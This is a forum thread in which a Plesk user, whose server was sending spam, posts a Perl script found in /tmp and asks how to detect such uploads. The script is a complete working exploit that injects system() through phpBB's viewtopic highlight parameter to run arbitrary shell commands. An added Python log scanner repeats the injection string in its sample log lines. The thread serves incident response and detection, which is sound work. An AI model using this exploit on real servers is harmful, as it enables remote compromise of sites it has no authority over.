
perl script uploaded to site

Discussion in 'Plesk for Linux - 8.x and Older' started by ElricM, Jul 3, 2005.

  1. ElricM

    ElricM Guest

     
    Two days ago, my site became super sluggish. I was configuring Apache and got an error that there were no available sockets; then I noticed I had almost 400,000 spam messages in the mail queue. So I rebooted the system, stopped the queue and deleted all the messages with qmail-remove. Today I found this in the /tmp directory:

    /tmp/outlaw/trash4.pl
    Code:
    use strict;
    use IO::Socket;
    
    unless ($ARGV[0]) { print "$0 <viewtopic url>\n"; exit(1); }
    
    $ARGV[0] =~ m![url]http://[/url](.*?)/(.*?t=\d+)!;
    my ($server, $port) = split (/:/,$1);
    $port   = 80 unless defined($port);
    $server  = $1 unless defined($server);
    my ($url, $command) = $2;
    
    print "$server - $port - $url\n";
    
    while () {
    		print "trash4> ";
    		while(<STDIN>) {
    				$command=$_;
    				chomp($command);
    				last;
    		}
    		&send($command);
    }
    
    sub send {
        my $ok	=	0;
        my $cmd	= "echo \"#PHPBBEXPLOIT#\";".$_[0].";echo \"#PHPBBEXPLOIT#\"";
        my $string  = "GET /$url&highlight='.system(getenv(HTTP_PHP)).' HTTP/1.1\n".
    					"Host: $server\nPHP: $cmd\n\n\n\n";
        my $socket = IO::Socket::INET->new(PeerAddr => $server,
    				PeerPort => $port,
    				Proto    => "tcp",
    				Type     => SOCK_STREAM)
    				or die "can't connect to: $server : $@\n";
    	print $socket $string;
    	while(<$socket>) {
    		if (/#PHPBBEXPLOIT#/) {
    				close($socket) and last if $ok eq 2;
    				$ok++;
    				next;
    		}
    		print if $ok eq "1";
    	}
    }
    exit 0;
    
    How do you prevent/detect stuff like this from being uploaded and executed?
     
  2. EvolutionCrazy

    EvolutionCrazy Basic Pleskian

  3. ElricM

    ElricM Guest

     
    Thanks a bunch. Very helpful.
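
On the detection half of the question, an added example (not part of the thread, and not Plesk or phpBB code): the script above places PHP in the `highlight` parameter of a viewtopic URL and carries the command itself in a `PHP:` request header, which a default Apache access log does not record, so the `highlight` value is the part that shows up in the logs. The sketch below scans access-log lines for a `highlight` value that closes a quote and calls a function; the log lines, addresses and function names are constructed for illustration, and the percent-decoding step is a generalization beyond the literal request shown in the script.

```python
import re
from urllib.parse import unquote

# Request line inside an Apache common/combined log entry.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/[\d.]+"')
# Value of the highlight parameter, up to the next '&'.
HIGHLIGHT = re.compile(r'[?&]highlight=([^&]*)', re.I)
# A quote that ends the string, then '.' and a function call, as in the script above.
BREAKOUT = re.compile(r"""['"]\s*\.\s*[A-Za-z_]\w*\s*\(""")


def decode(value, rounds=3):
    """Percent-decode until stable; the logged value may be encoded more than once."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_requests(lines):
    """Return (client_ip, decoded_highlight) for every flagged log line."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a parseable request line
        h = HIGHLIGHT.search(m.group("target"))
        if h and BREAKOUT.search(decode(h.group(1))):
            hits.append((m.group("ip"), decode(h.group(1))))
    return hits


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2005:10:00:00 +0000] "GET /viewtopic.php?t=12&highlight=perl HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jul/2005:10:00:05 +0000] "GET /viewtopic.php?t=12&highlight=\'.system(getenv(HTTP_PHP)).\' HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Jul/2005:10:00:09 +0000] "GET /viewtopic.php?t=12&highlight=%27.system(getenv(HTTP_PHP)).%27 HTTP/1.1" 200 640',
    '203.0.113.4 - - [01/Jul/2005:10:01:00 +0000] "GET /viewtopic.php?t=3&highlight=don%27t+panic HTTP/1.1" 200 4301',
]

if __name__ == "__main__":
    for ip, value in suspicious_requests(SAMPLE_LOG):
        print(f"{ip}  highlight={value}")
```

Feeding it the real access log (for example `suspicious_requests(open(path))`) gives the client addresses and timestamps to correlate with files that appeared in /tmp.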
     